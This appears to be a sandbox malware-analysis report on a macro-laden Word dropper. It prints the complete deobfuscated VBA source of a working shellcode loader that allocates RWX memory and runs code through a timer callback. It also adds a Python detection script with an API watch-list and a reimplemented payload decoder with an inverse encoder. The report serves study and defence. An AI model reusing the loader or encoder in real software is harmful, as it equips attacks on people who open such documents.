Verdict: MALICIOUS (risk score 110)

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1140 Deobfuscate/Decode Files or Information
The sample contains VBA macros, including a `Document_Open` auto-run macro, and carries a lure telling the user to enable content. ClamAV classifies it as a dropper (Doc.Dropper.Agent-6337026-0). The macro code is heavily obfuscated with dictionary-word identifiers, junk arithmetic, dead `Pmt` calls and song-lyric comments, but the real control flow is short. `Document_Open` calls `hypo`, which reads the last 7,844 characters of a string stored on a control of the UserForm module `unconventionally` (`semihard.SelectedItem.Name`), decodes it with `aphid.moses` (a standard base64 decoder whose input has first been shifted by +4 on even and +3 on odd character positions), allocates 9,747 bytes of PAGE_EXECUTE_READWRITE memory (protect 0x40, MEM_COMMIT) in the current process (handle -1) through `NtAllocateVirtualMemory`, copies the 5,883 decoded bytes into it with `NtWriteVirtualMemory` (the helper `rembrandt` is a memcpy built on that call), and then executes them by registering an address inside the buffer as a `CreateTimerQueueTimer` callback. The APIs are imported under renamed `Declare` aliases (`framing`, `agrypnotic`, `mast`), and `#If ... Win64` blocks with arithmetic-obfuscated conditions select `Long` versus `PtrSafe`/`LongPtr` declarations so the loader works on both 32-bit and 64-bit Office. Nothing in the macro fetches a URL: the second stage is embedded in the document itself, and the only non-namespace URL extracted (the eastoftheweb.com link) appears in the document body text, not in any macro code. The `Document_Open` macro together with the enable-content lure points to a spearphishing attachment as the delivery vector; the direct use of NT native APIs also corresponds to MITRE ATT&CK T1106 (Native API), which is not in the list above.
Heuristics (5)

- ClamAV: Doc.Dropper.Agent-6337026-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Agent-6337026-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding). Document contains VBA macro code.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Private Sub Document_Open()`.
- Macro/content-enable lure (medium, SE_ENABLE_LURE). Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels show which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in document text (OLE body) and none is referenced from the macro code:
  - http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/photoshop/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://schemas.openxmlformats.org/drawingml/2006/main
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml

  The ns.adobe.com, w3.org, purl.org and schemas.openxmlformats.org entries are XML namespace identifiers from embedded-image XMP metadata and Office document parts, not network indicators. The eastoftheweb.com link is the only real web address in the list; it sits in the body text and no code path in the macro touches it, so it should not be treated as the payload source.
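The heuristics above fire on generic features (a macro, an auto-run sub, a lure). What actually identifies this sample as an in-process shellcode loader is the set of APIs behind its renamed `Declare` aliases. The following is an added example, not code from the report or the analyzer, showing how to resolve those aliases from extracted VBA source and flag the allocate/write/execute combination. `SAMPLE_MODULE` is constructed from three `Declare` lines in the dump below plus a benign decoy; the API sets are an assumption about what is worth flagging, not an exhaustive list.

```python
"""Flag a VBA in-process shellcode loader by the APIs it imports, not by its names."""
import re

# Allocate / write / execute primitives commonly chained by VBA shellcode loaders
# (an assumed watch-list for this example, not a complete catalogue).
ALLOC_APIS = {"NtAllocateVirtualMemory", "VirtualAlloc", "VirtualAllocEx", "VirtualProtect"}
WRITE_APIS = {"NtWriteVirtualMemory", "WriteProcessMemory", "RtlMoveMemory", "RtlCopyMemory"}
EXEC_APIS = {"CreateTimerQueueTimer", "CreateThread", "CreateRemoteThread",
             "QueueUserAPC", "NtQueueApcThread"}

DECLARE_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+'
    r'(?P<name>\w+)\s+Lib\s+"(?P<lib>[^"]+)"\s*(?:Alias\s+"(?P<alias>[^"]+)")?',
    re.IGNORECASE,
)


def join_continuations(src: str) -> list:
    """Glue VBA line continuations (trailing ' _') so a split Declare matches as one line."""
    lines, pending = [], ""
    for line in src.splitlines():
        if line.rstrip().endswith(" _"):
            pending += line.rstrip()[:-1]      # drop the underscore, keep the space
            continue
        lines.append(pending + line)
        pending = ""
    if pending:
        lines.append(pending)
    return lines


def resolve_declares(src: str) -> dict:
    """Map each VBA-visible name to (library, real export).

    The Alias is the real import; the VBA name is free text. Library names are
    stripped and lower-cased because the sample writes them as "Ntdll.dll " with a
    trailing space, which defeats naive exact-string matching.
    """
    imports = {}
    for line in join_continuations(src):
        m = DECLARE_RE.match(line)
        if m:
            real = m.group("alias") or m.group("name")
            imports[m.group("name")] = (m.group("lib").strip().lower(), real)
    return imports


def shellcode_loader_indicators(src: str) -> dict:
    """Return the allocate/write/execute APIs found and whether all three are present."""
    imports = resolve_declares(src)
    apis = {real for _, real in imports.values()}
    result = {
        "alloc": sorted(apis & ALLOC_APIS),
        "write": sorted(apis & WRITE_APIS),
        "exec": sorted(apis & EXEC_APIS),
        "renamed": sorted(n for n, (_, real) in imports.items() if n != real),
    }
    result["verdict"] = bool(result["alloc"] and result["write"] and result["exec"])
    return result


# Constructed sample: three Declares copied from the dump, one benign decoy (Sleep),
# and a continuation line to exercise join_continuations().
SAMPLE_MODULE = '''\
Public Declare Function framing Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (advantaged As Long, cachalot As Long, ByVal bream As Long, sojournByVal As Long, commodious As Long, ByVal cantibus As Long) As Long
Public Declare Function mast Lib "Kernel32" Alias "CreateTimerQueueTimer" (breechcloth As Any, ByVal puku As Any, ByVal aboriginal As Any, ByVal horneophyton As Any, ByVal powder As Any, ByVal piper As Any, ByVal betulaceae As Any) As Long
Public Declare Function agrypnotic Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal pucciniaceae As Any, ByVal stalk As Any, ByVal unfurl As Any, ByVal copernicus As Any, ByVal mannitol As Any) As Long
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
'''


if __name__ == "__main__":
    for name, (lib, real) in resolve_declares(SAMPLE_MODULE).items():
        print(f"{name:12s} -> {lib}!{real}")
    print(shellcode_loader_indicators(SAMPLE_MODULE))
```

Run it against the `macros.bas` that olevba extracts and the verdict is driven by `NtAllocateVirtualMemory` + `NtWriteVirtualMemory` + `CreateTimerQueueTimer`, regardless of what the author called them; the `renamed` list is a useful secondary signal, since legitimate code rarely aliases every import to a random dictionary word.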
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12584 bytes | 1735d617d4221067bff1e872b33ef460737344b19bfa21c83116d490e86e8f41 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub hypo()
Dim mormonism As Byte
Dim unintelligent As Long
unconventionally.semihard.Value = Day(#12/5/2013#)
varday = ingenue = "flirtation"
Arrange = whisperings
unculled = "quartermaster"
forbears = "frigg"
henhearted = conscientia
aegri = "inclines"
corsage = "chalks"
Set voluptuousness = unconventionally.semihard.SelectedItem
hairdresser = 4 - 1
letter = 15760 + 9
selfsustained = 551790 + 8
Pmt 0, hairdresser, 33518, 17727, 2
pituitary = voluptuousness.Name
Caldar = 7840 + 4
bubalus = Right(pituitary, Caldar)
clashing = aphid.moses(bubalus)
hornblende = 60 + 4
buildup = 22010 + 5
Pmt 0, hornblende, 15545, 59752, 4
stretchable = "spirituous"
rosilla = "flurry"
#If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then
Dim doeuvre As Integer
Dim geothlypis As LongPtr
Dim complaint As LongPtr
Dim adapa As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < Win64 Then
Dim asinus As String
Dim complaint As Long
Dim aftershave As Integer
Dim geothlypis As Long
#End If
columniation = 4 - 4
blasphemer = "aminophylline"
amalgamated = "indefatigableness"
annoying = 109 + 86 + 3901
antifungal = 6 + 4
methyl = 22500 + 1
disproportionately = 511750 + 9
Pmt 0, antifungal, 10746, 56343, 5
heterogenous = allargando
deodorization = nycticorax
fireside = "catchment"
timekeeping = "fulgoridae"
finalist = 2 - 1
commixion = 11240 + 6
burgundy = 461550 + 7
Pmt 0, finalist, 25098, 46733, 3
endodontics = clashing
distressfully = "causatives"
geothlypis = malpighiaceae(endodontics)
extracellular = trepidation
#If (3 * 4 + 5) > (5 - 2 * 1) And Win64 > (8 - 4 * 2) * 2 Then
Dim aweinspiring As Variant
Dim buxaceae As LongPtr
Dim moneyless As LongPtr
Dim otoscope As LongPtr
gabelle = 116 + 1948
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < Win64 Then
Dim buxaceae As Long
picayune = 121 + 660
Dim moneyless As Long
Dim otoscope As Long
gabelle = picayune + 3459
#End If
Dim coxcombry As Variant
Dim psychophysics As Integer
buxaceae = 3 - 3
complaint = geothlypis + gabelle
moneyless = 201520 + 7
otoscope = 84 - 118 + 3534
blackcock = mast(moneyless, buxaceae, complaint, buxaceae, buxaceae, buxaceae, buxaceae)
peerage = 10 + 1
anni = 6650 + 3
myelencephalon = 429390 + 2
Pmt 0, peerage, 7323, 57225, 7
End Sub
Function malpighiaceae(unimportance)
Dim bladder As String
Dim estranging As String
Dim justititiae As String
Dim hasty As String
#If (6 * 3 + 5) > (7 - 2 * 1) And Win64 > (48 - 6 * 8) * 2 Then
Dim ultimo As String
Dim sumerology As LongPtr
crassitude = 3 + 39 - 34
Dim accounting As LongPtr
Dim positionable As Integer
Dim nemo As Long
Dim britannic As LongPtr
Dim consolidation As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim sumerology As Long
crassitude = 56 - 4 - 48
Dim accounting As Long
Dim britannic As Long
#End If
Count = VarPtr(sumerology)
mastotermitidae = rembrandt(Count, VarPtr(unimportance) + 8, crassitude)
magnanimity = -1
accounting = 0
bitumen = 31 + 48 - 79
britannic = 9747
oaths = 4096
boxcar = 64
cobia = framing(ByVal magnanimity, accounting, ByVal bitumen, britannic, ByVal oaths, ByVal boxcar)
cocentric = "dinvention"
ctene = lateward - 163
rembrandt accounting, sumerology, 5883
centaury = 63
augurous = 30695
comply = 285608
Pmt 0, centaury, 24833, 59021, 3
malpighiaceae = accounting
End Function
Private Sub Document_Open()
Dim feeling As Integer
Dim demonstrative As Variant
cancroid = "parang"
butterwort = "allograph"
hypo
collectanea = 78
needs = 34258
vero = 291498
Pmt 0, collectanea, 21146, 10215, 4
End Sub
Function rembrandt(corkscreq, messiah, abrogated)
#If (7 * 4 + 5) > (7 - 2 * 1) And Win64 > (20 - 5 * 4) * 2 Then
Dim brumous As Variant
Dim contemptible As Variant
Dim neurology As LongPtr
Dim bimestrial As LongPtr
Dim assuring As LongPtr
Dim chopin As Integer
Dim decameter As LongPtr
Dim myself As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim bimestrial As Long
Dim divorce As Variant
Dim neurology As Long
Dim shameless As Integer
Dim decameter As Long
Dim carotenoid As Variant
Dim assuring As Long
Dim chaffy As String
Dim myself As Long
Dim broadax As Byte
Dim aflutter As Integer
#End If
gi = "bivalvular"
cachexia = cachexia + 159
bimestrial = corkscreq
myself = abrogated
faineance = "rudera"
decameter = messiah
diplomatically = 77
socius = 28789
sealskin = 555429
Pmt 0, diplomatically, 37216, 51573, 3
cocentric = faineance
neurology = 124 + 39 - 164
agrypnotic ByVal neurology, bimestrial, decameter, myself, assuring
cocentric = gi
End Function
Attribute VB_Name = "aphid"
' But just your sight had my heart storming
' From the moment when
#If (16 / 4 + 2) > (7 - 2 * 1) And Not (32 / 8 - 1 * 4) * 2 < Win64 Then
' Knew it was gonna be a long night
' But just your sight had my heart storming
Public Declare Function mongoose Lib "ntdll.dll " Alias "AcquireSRWLockShared" (auscultatory As Any) As Long
' And hit me like a hurricane' If I woulda just layed my drink down
Public Declare Function demagogic Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal cooky As Any, entrant As Any, molokai As Any, bowwow As Any) As Long
' We locked eyes over whiskey on ice
' You wrecked my whole world when you came
Public Declare Function framing Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (advantaged As Long, cachalot As Long, ByVal bream As Long, sojournByVal As Long, commodious As Long, ByVal cantibus As Long) As Long
' But just your sight had my heart storming
' And hit me like a hurricane
Public Declare Function mast Lib "Kernel32" Alias "CreateTimerQueueTimer" (breechcloth As Any, ByVal puku As Any, ByVal aboriginal As Any, ByVal horneophyton As Any, ByVal powder As Any, ByVal piper As Any, ByVal betulaceae As Any) As Long
' Hit me like a hurricane
' But just your sight had my heart storming
Public Declare Function agrypnotic Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal pucciniaceae As Any, ByVal stalk As Any, ByVal unfurl As Any, ByVal copernicus As Any, ByVal mannitol As Any) As Long
' The moon went hiding, stars quit shining
' Baby, without warning
#End If
' Rain was driving, thunder, lightning
' The moon went hiding, stars quit shining
#If (16 / 4 + 5) > (7 - 2 * 1) And (25 - 5 * 5) * 2 < Win64 Then
' The moon went hiding, stars quit shining
' But you rolled in with your hair in the wind
Public Declare PtrSafe Function agrypnotic Lib "ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal interlinear As Any, ByVal footlocker As Any, ByVal sunbeams As Any, ByVal recoilless As Any, ByVal distempering As Any) As LongPtr
' I was doing alright
' And hit me like a hurricane
Public Declare PtrSafe Function framing Lib "ntdll.dll " Alias _
"NtAllocateVirtualMemory" (cyrilla As LongPtr, fb As LongPtr, ByVal spectator As LongPtr, aurousByVal As LongPtr, conenose As LongPtr, ByVal closeted As LongPtr) As LongPtr
' We locked eyes over whiskey on ice
' And hit me like a hurricane
Public Declare PtrSafe Function mast Lib "Kernel32" Alias "CreateTimerQueueTimer" (incurably As Any, ByVal piddle As Any, ByVal interruption As Any, ByVal frigidarium As Any, ByVal urn As Any, ByVal equations As Any, ByVal cladorhyncus As Any) As Long
' I wouldnt be in my truck
' Driving us to your house
Public Declare PtrSafe Function corticohypothalamic Lib "ntdll.dll " Alias "AcquireSRWLockShared" (denounce As Any) As LongPtr
' Baby, without warning
' The moon went hiding, stars quit shining
Public Declare PtrSafe Function commonlaw Lib "ntdll.dll" Alias "NtCreateEventPair" (cuticular As LongPtr, heelbone As LongPtr, subordinate As LongPtr) As LongPtr
' I wouldnt be in my truck
' I was doing alright
Public Declare PtrSafe Function antifreeze Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal annexational As Any, breadstuff As Any, rotogravure As Any, shanks As Any) As LongPtr
' I was doing alright
' But you rolled in with your hair in the wind
' I was doing alright
' But just your sight had my heart storming
#End If
' You wrecked my whole world when you came
' Baby, without warning
Function cabal(bluff, acinus, acidforming)
Select Case acidforming
Case (40 + 9) + (10 / 2 - 5)
cabal = bluff \ acinus
Case (50 + 9) + (5 - 3) / 2 - 1
cabal = bluff And acinus
Case (60 + 7) + (56 / 7 - 4 * 2)
cabal = bluff * acinus
End Select
End Function
Function strife()
Dim climatology(255) As Byte
holy = 18 + 63 - 16
Do
climatology(holy) = holy - 65
holy = holy + 1
Loop While holy <= 90 + 1
holy = 48
Do
climatology(holy) = holy + 4
holy = holy + 1
Loop While holy <= 50 + 8
holy = 97
Do
climatology(holy) = holy - 71
holy = holy + 1
Loop While holy <= 120 + 3
climatology(47) = 63
holy = 43
climatology(holy) = 60 + 2
strife = climatology
End Function
Function chilblain(beetroot)
chilblain = AscW(beetroot)
End Function
Function moses(locker) As String
Dim dogma As Integer
Dim defended As Long
Dim matchstick(6962) As Byte
ctene = Rnd(122)
Dim annunciation As String
Dim armenian As String
gi = "nobleman"
Dim doorbell(63) As Long
Dim theoretical(63) As Long
Dim cytosine As String
Dim metrology As String
Dim metacarpal As Long
Dim oxyacid As Long
faineance = gi
Dim methylenedioxymethamphetamine As Integer
Dim rasper(63) As Long
Dim goggleeyed() As Byte
Dim sidesaddle As Long
plenitude = 113 + 257935
footfault = 45 + 3987
Dim cuckoo As Byte
anticoagulant = 65536
ramjet = 11 + 78 + 4007
cavern = 63
valency = 255
photographic = 16515072
noctiluca = 16711680
ataxic = 262144
argyle = 110 + 56 + 65114
Dim extraction As Integer
deluge = 256
cockfight = 104 - 116 + 76
Dim considerate As Long
Dim blight As String
baseless = 120 - 107 - 13
abusive = 7843
Dim canopy() As Byte
Dim iberis As Variant
Dim strapping As Integer
canopy = VBA.StrConv(locker, 128)
Dim moonwort As Long
catsclaw = 110 + 3
authorial = 7780 + 8
taichung = 269860 + 1
VBA.Financial.Pmt 0, catsclaw, 36487, 27341, 5
newport = 7840 + 3
lanceolate = vbKeyShift - 12
For liza = 0 To newport
If liza Mod 2 = 0 Then
canopy(liza) = canopy(liza) - lanceolate
Else
canopy(liza) = canopy(liza) - (lanceolate - 1)
End If
Next liza
methionine = 51
absinth = 23486
metrongr = 531748
VBA.Financial.Pmt 0, methionine, 32023, 15407, 6
methylenedioxymethamphetamine = 0
psoriasis = 0
bhaga = 123 - 80
finality = strife
For sidesaddle = (7 - 7) * 1 To (50 + 13) * (5 - 4)
doorbell(sidesaddle) = cabal(sidesaddle, cockfight, 67)
rasper(sidesaddle) = cabal(sidesaddle, ramjet, 67)
theoretical(sidesaddle) = cabal(sidesaddle, ataxic, 67)
Next sidesaddle
pterocnemia = 43
cambium = 4497
ascocarp = 441385
VBA.Financial.Pmt 0, pterocnemia, 16027, 48365, 5
goggleeyed = canopy
fireball = 46 - 42
lebanese = 15
harvesthome = 37472
byssus = 139566
VBA.Financial.Pmt 0, lebanese, 3155, 19269, 6
counterfeit = 3
gi = "gabled"
gi = "aleurone"
childbirth = counterfeit + 1
unmitigable = 119 + 48 - 165
For metacarpal = 0 To newport
carrefour = goggleeyed(metacarpal)
eroded = goggleeyed(metacarpal + 2)
antarctic = rasper(finality(goggleeyed(metacarpal + 1)))
bombsight = doorbell(finality(eroded)) + finality(goggleeyed(metacarpal + counterfeit))
defended = theoretical(finality(carrefour)) + antarctic + bombsight
sidesaddle = cabal(defended, noctiluca, 59)
matchstick(oxyacid) = cabal(sidesaddle, anticoagulant, 49)
sidesaddle = cabal(defended, argyle, 59)
matchstick(oxyacid + 1) = cabal(sidesaddle, deluge, 49)
matchstick(oxyacid + unmitigable) = cabal(defended, valency, 59)
oxyacid = oxyacid + unmitigable + 1
metacarpal = metacarpal + 3
Next
moses = matchstick
End Function
Attribute VB_Name = "unconventionally"
Attribute VB_Base = "0{B925BDA0-D446-4ACC-8E1A-9B365BFB503A}{7780F35C-1158-4134-B42D-425A036B13A7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
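To recover the embedded payload from the UserForm string, the decoder in `aphid.moses` has to be reproduced outside Office. The block below is an added example, not code from the report: `build_table`, `unshift` and `decode_blob` transcribe the `strife`, shift-loop and bit arithmetic from the dump above, and `encode_blob` is the inverse transform (not present in the macro) so the decoder can be checked against a constructed sample. No real payload is included; `SAMPLE_PAYLOAD` is three stand-in bytes.

```python
"""Re-implementation of the macro's payload decoder (aphid.moses / strife / cabal)."""
import base64

# lanceolate = vbKeyShift - 12 = 4: even-indexed characters were shifted by 4,
# odd-indexed ones by lanceolate - 1 = 3 (the first loop in moses() subtracts them).
EVEN_SHIFT = 4
ODD_SHIFT = 3


def build_table() -> list:
    """The 256-entry lookup built by strife(): a standard base64 value table.

    Unset entries stay 0, so '=' padding (0x3D) decodes to zero bytes, as in the macro.
    """
    table = [0] * 256
    for c in range(65, 92):        # 'A'..'Z' -> 0..25 (loop overshoots to '[' -> 26)
        table[c] = c - 65
    for c in range(48, 59):        # '0'..'9' -> 52..61 (overshoots to ':' -> 62)
        table[c] = c + 4
    for c in range(97, 124):       # 'a'..'z' -> 26..51 (overshoots to '{' -> 52)
        table[c] = c - 71
    table[47] = 63                 # '/'
    table[43] = 62                 # '+'
    return table


def unshift(blob: bytes) -> bytes:
    """Undo the per-position shift applied to the stored string (Byte arithmetic, mod 256)."""
    return bytes((b - (EVEN_SHIFT if i % 2 == 0 else ODD_SHIFT)) & 0xFF
                 for i, b in enumerate(blob))


def decode_blob(blob: bytes) -> bytes:
    """Decode as moses() does: unshift, then every 4 characters -> 3 bytes.

    The macro walks the buffer in steps of 4 and emits
    (v & 0xFF0000) // 65536, (v & 0xFF00) // 256, v & 255 for each group, where
    v = t0<<18 | t1<<12 | t2<<6 | t3 (the doorbell/rasper/theoretical arrays are
    just t*64, t*4096 and t*262144, and cabal() is the \\ / And / * dispatcher).
    """
    table = build_table()
    chars = unshift(blob)
    out = bytearray()
    for i in range(0, len(chars) // 4 * 4, 4):
        v = ((table[chars[i]] << 18) | (table[chars[i + 1]] << 12)
             | (table[chars[i + 2]] << 6) | table[chars[i + 3]])
        out += bytes(((v >> 16) & 0xFF, (v >> 8) & 0xFF, v & 0xFF))
    return bytes(out)


def encode_blob(payload: bytes) -> bytes:
    """Inverse transform (not present in the macro): base64, then re-apply the shifts."""
    return bytes((b + (EVEN_SHIFT if i % 2 == 0 else ODD_SHIFT)) & 0xFF
                 for i, b in enumerate(base64.b64encode(payload)))


# Constructed sample: three bytes of stand-in "shellcode", not the sample's real payload.
SAMPLE_PAYLOAD = bytes.fromhex("9090cc")
SAMPLE_BLOB = encode_blob(SAMPLE_PAYLOAD)   # == b"oMHP"


def main() -> None:
    print("blob as stored  :", SAMPLE_BLOB)
    print("decoded payload :", decode_blob(SAMPLE_BLOB).hex())
    # The macro takes the last 7,844 characters and copies 5,883 decoded bytes into
    # the RWX region, which is exactly 7844 / 4 * 3.
    print("7844 chars ->", len(decode_blob(bytes(7844))), "bytes")


if __name__ == "__main__":
    main()
```

The sizes hard-coded in the macro line up with this layout: `Right(pituitary, 7844)` yields 1,961 base64 groups, the 5,883 passed to `rembrandt` is their decoded length, and the 9,747-byte `NtAllocateVirtualMemory` region leaves room for the callback offset (`gabelle`, 2,064 bytes on 64-bit Office or 4,240 on 32-bit) that `hypo` adds before handing the address to `CreateTimerQueueTimer`. The UserForm string itself is not in this report; feed the `.Name` value carved from the `unconventionally` form to `decode_blob` to obtain the second stage.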